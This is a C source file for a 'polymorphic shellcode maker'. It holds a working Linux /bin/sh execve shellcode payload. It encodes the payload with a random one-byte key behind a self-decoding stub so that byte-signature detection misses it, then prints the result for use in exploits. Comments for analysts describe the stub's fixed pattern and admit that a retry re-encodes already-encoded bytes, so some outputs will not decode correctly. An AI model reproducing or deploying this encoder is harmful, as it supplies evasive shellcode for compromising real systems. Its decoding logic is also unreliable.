A polymorphic shellcode maker
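/*
 * A polymorphic shellcode maker.
 *
 * Original program created by Rizki Wicaksono (http://www.ilmuhacking.com).
 * I added some functions to make it more interesting: "sub" and "add"
 * operations beside the original xor in the decoder.
 * otoy (http://otoyrood.wordpress.com) 0x82010
 *
 * What the program does: it transforms a fixed payload byte-by-byte with a
 * one-byte key (subtract, xor, add), prepends a fixed decoder stub patched
 * with the payload length and the key, and prints the result as a C string
 * literal.
 *
 * Notes for analysts reading the output:
 *  - Only offsets 6, 9, 12 and 15 of the stub change between runs (length
 *    byte and three copies of the key); offsets 8 and 14 are overwritten
 *    with constants. Every other stub byte is identical in every sample,
 *    so the stub is a fixed byte pattern with four variable positions.
 *  - The key is a single byte drawn from random() seeded with the wall
 *    clock: 0..199 on the first attempt, 0..9 on any retry.
 */
#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/*
 * Return a pseudo-random integer in [0, quo).
 *
 * The generator is reseeded from gettimeofday() on every call, so values are
 * predictable from the time of the call; this is not a source of secrets.
 * A non-positive quo returns 0 instead of dividing by zero.
 */
int getnumber(int quo)
{
    struct timeval tm;
    unsigned int seed;

    if (quo <= 0) {
        return 0;
    }

    gettimeofday(&tm, NULL);
    /* Unsigned arithmetic: wrap-around is well defined, the low bits are all
     * that srandom() uses anyway. */
    seed = (unsigned int)tm.tv_sec + (unsigned int)tm.tv_usec;
    srandom(seed);

    return (int)(random() % quo);
}

/*
 * Print a NUL-terminated byte string as a C string literal made of \xNN
 * escapes, 15 bytes per source line, followed by ";" and a blank line.
 * Output stops at the first zero byte in data.
 */
void print_code(char *data)
{
    const unsigned char *bytes = (const unsigned char *)data;
    size_t len = strlen(data);  /* computed once, not on every iteration */
    size_t i;
    int l = 0;                  /* bytes printed on the current line */

    for (i = 0; i < len; ++i) {
        if (l == 0) {
            printf("\"");
        }
        if (l >= 15) {
            printf("\"\n\"");
            l = 0;
        }
        printf("\\x%02x", bytes[i]);
        ++l;
    }
    printf("\";\n\n");
}

/*
 * Encode the embedded payload, patch the decoder stub, and print
 * "Key: <hex>" followed by stub + encoded payload as a C string literal.
 * Returns 0 on success, 1 if the output buffer cannot be allocated.
 */
int main(void)
{
    char shellcode[] =
        /* "/bin/sh" shellcode */
        /* put our own shellcode here */
        "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
    int count;
    int number = getnumber(200);
    int badchar = 0;
    int ldecoder;
    int lshellcode = strlen(shellcode);
    char *result;
    char decoder[] =
        "\xeb\x13\x5e\x31\xc9\xb1\x00\x80\x06\x00\x80\x36\x00\x80\x2e"
        "\x00\x46\xe2\xf4\xeb\x05\xe8\xe8\xff\xff\xff";

    /* Patch the stub: payload length at offset 6, key at offsets 9/12/15. */
    decoder[6] = lshellcode;
    decoder[9] = number;
    decoder[12] = number;
    decoder[15] = number;
    /* Length is taken with strlen(), so it ends at the first zero byte that
     * is left in the patched stub. */
    ldecoder = strlen(decoder);

    do {
        if (badchar == 1) {
            /* A zero byte appeared in the previous pass: pick a new key. */
            number = getnumber(10);
            decoder[9] = number;
            decoder[12] = number;
            decoder[15] = number;
            badchar = 0;
            printf("New Key: %2x\n", (unsigned int)number);
        }
        /* The transform is applied in place, so a retry runs over the output
         * of the previous pass, not over the original bytes. */
        for (count = 0; count < lshellcode; count++) {
            shellcode[count] = shellcode[count] - number;
            shellcode[count] = shellcode[count] ^ number;
            shellcode[count] = shellcode[count] + number;
            if (shellcode[count] == '\0') {
                badchar = 1;
            }
        }
    } while (badchar == 1);

    /* Overwrite two stub bytes with fixed values (same in every run). */
    decoder[8] = 46;
    decoder[14] = 6;

    /* +1 for the terminator that print_code() relies on. The original code
     * called strcat() on uninitialised malloc() memory and left no room for
     * the NUL, which is undefined behaviour and a heap overflow. */
    result = malloc((size_t)lshellcode + (size_t)ldecoder + 1);
    if (result == NULL) {
        perror("malloc");
        return 1;
    }
    memcpy(result, decoder, (size_t)ldecoder);
    memcpy(result + ldecoder, shellcode, (size_t)lshellcode);
    result[ldecoder + lshellcode] = '\0';

    printf("Key: %02x\n", (unsigned int)number);
    print_code(result);

    free(result);
    return 0;
}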